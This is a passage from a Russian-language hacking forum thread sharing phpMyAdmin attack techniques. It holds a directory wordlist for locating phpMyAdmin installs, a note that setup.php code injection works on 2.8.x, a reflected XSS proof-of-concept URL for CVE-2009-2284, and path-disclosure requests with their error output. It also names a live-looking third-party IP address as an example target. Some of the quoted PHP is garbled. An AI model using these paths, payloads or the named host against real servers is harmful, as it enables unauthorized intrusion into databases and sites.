    /phpMyAdmin-2.7.0-pl1/
    /phpMyAdmin-2.7.0-pl2/
    /phpMyAdmin-2.8.0-beta1/
    /phpMyAdmin-2.8.0-rc1/
    /phpMyAdmin-2.8.0-rc2/
    /phpMyAdmin-2.8.0/
    /phpMyAdmin-2.8.0.1/
    /phpMyAdmin-2.8.0.2/
    /phpMyAdmin-2.8.0.3/
    /phpMyAdmin-2.8.0.4/
    /phpMyAdmin-2.8.1-rc1/
    /sqlmanager/
    /mysqlmanager/
    /p/m/a/
    /PMA2005/
    /pma2005/
    /phpmanager/
    /php-myadmin/
    /phpmy-admin/
    /webadmin/
    /sqlweb/
    /websql/
    /webdb/
     
    _________________________
  16. (Dm)

    (Dm) Elder - Старейшина

    Joined:
    8 Apr 2008
    Messages:
    265
    Likes Received:
    440
    Reputations:
    275
    По поводу уязвимости phpMyAdmin (/scripts/setup.php) PHP Code Injection добавлю что phpMyAdmin 2.8.x также уязвима.
    Проверял на phpMyAdmin 2.8.0.3 Главное чтобы права на запись были (
     
  17. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    241
    Likes Received:
    299
    Reputations:
    165
    libraries/config.default.php
    PHP:
    $cfg['ShowPhpInfo'] = false;
    Все зависит от настроек. по дефолту выключено.
     
    3 people like this.
  18. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    296
    Likes Received:
    581
    Reputations:
    256
    phpMyAdmin SQL bookmark HTML Injection Vulnerability
    Code:
    Bugtraq ID: 	35543 
    Class: 	Input Validation Error 
    CVE:	 	CVE-2009-2284
    Remote: 	Yes 
    Local: 	No 
    Published: 	Jun 30 2009 12:00AM 
    Updated: 	Aug 21 2009 03:57PM 
    Credit: 	Sven Vetsch 
    Vulnerable: 	RedHat Fedora 9 0
    		RedHat Fedora 11
    		RedHat Fedora 10
    		phpMyAdmin phpMyAdmin 3.1.1 1
    		phpMyAdmin phpMyAdmin 3.1.1 0
    		phpMyAdmin phpMyAdmin 3.1 0
    		phpMyAdmin phpMyAdmin 3.0.1 
    		phpMyAdmin phpMyAdmin 3.0 
    		phpMyAdmin phpMyAdmin 3.2.0-rc1
    		phpMyAdmin phpMyAdmin 3.1.3.2
    		phpMyAdmin phpMyAdmin 3.1.3.1
    		phpMyAdmin phpMyAdmin 3.0.1.1
    		MandrakeSoft Enterprise Server 5 x86_64
    		MandrakeSoft Enterprise Server 5
    Эксплойта или более конкретного описания в инете не нашел. Покопался сам:
    Code:
    /sql.php?db=test&token=849967e893f3ea2c0205f71270269616&sql_query=SELECT+%3Cscript%3Ealert()%3C/script%3E
     
    4 people like this.
  19. Xcontrol212

    Xcontrol212 Elder - Старейшина

    Joined:
    13 Feb 2008
    Messages:
    327
    Likes Received:
    110
    Reputations:
    7
    Раскрытие путей
    phpMyAdmin 2.6.1

    Code:
    http://localhost/Tools/phpMyAdmin/server_variables.php?lang=ru-win1251&server=1&collation_connection='
    Code:
    Fatal error: Call to undefined function PMA_reloadNavigation() in Z:\home\l
    calhost\www\Tools\phpmyadmin\header.inc.php on line 132
    Уязвимая часть :
    PHP:
     function PMA_reloadNavigation() { 
            global $cfg; 

            // Reloads the navigation frame via JavaScript if required 
            if (isset($GLOBALS['reload']) && $GLOBALS['reload']) { 
                echo "\n"; 
                $reload_url = './left.php?' . PMA_generate_common_url((isset($GLOBALS['db']) ? $GLOBALS['db'] : ''), '', '&'); 
                ?> 
    <script type="text/javascript" language="javascript1.2"> 
    <!-- 
    if (typeof(window.parent) != 'undefined' 
        && typeof(window.parent.frames['nav']) != 'undefined') { 
        window.parent.frames['nav'].goTo('<?php echo $reload_url?>&hash=' + <?php echo (($cfg['QueryFrame'] && $cfg['QueryFrameJS']) ? 'window.parent.frames[\'queryframe\'].document.hashform.hash.value' "'" md5($cfg['PmaAbsoluteUri']) . "'"); ?>); 

    //--> 
    </script> 
                <?php 
                
    unset($GLOBALS['reload']); 
            } 
        }
    UPD
    Code:
    http://localhost/Tools/phpMyAdmin/footer.inc.php
    Code:
    Notice: Undefined variable: cfg in Z:\home\localhost\www\Tools\phpmyadmin\footer.inc.php on line 17
    Уязвимый код:
    PHP:
    <?php
    /* $Id$ */
    // vim: expandtab sw=4 ts=4 sts=4:

    /**
     * WARNING: This script has to be included at the very end of your code because
     *          it will stop the script execution!
     */

    require_once('./libraries/relation.lib.php'); // for PMA_setHistory()

    /**
     * Query window
     */

    // If query window is wanted and open, update with latest selected db/table.
    if ($cfg['QueryFrame'] && $cfg['QueryFrameJS']) {
    ?>
    Code:
    http://localhost/Tools/phpMyAdmin/mult_submits.inc.php
    Code:
    Fatal error: Call to undefined function PMA_DBI_select_db() in Z:\home\localhost\www\Tools\phpmyadmin\mult_submits.inc.php on line 385
    Уязвимый код:
    PHP:
    if ($run_parts) { 
                
    $sql_query .= $a_query ';' "\n";
                if (
    $query_type != 'drop_db') {
                    
    PMA_DBI_select_db($db);
                }
                
    $result = @PMA_DBI_query($a_query) or PMA_mysqlDie(''$a_queryFALSE$err_url);
            } 
    // end if
        
    // end for

        
    if ($use_sql) {
            require(
    './sql.php');
        } elseif (!
    $run_parts) {
            
    PMA_DBI_select_db($db);
            
    $result PMA_DBI_query($sql_query);
        }

    }

    ?>


    (C)Xcontrol212
     
    #19 Xcontrol212, 16 Dec 2009
    Last edited: 17 Dec 2009
    3 people like this.
  20. Xcontrol212

    Xcontrol212 Elder - Старейшина

    Joined:
    13 Feb 2008
    Messages:
    327
    Likes Received:
    110
    Reputations:
    7
    По changelog.php
    Пример:
    http://87.106.94.86/phpmyadmin/changelog.php
     
Loading...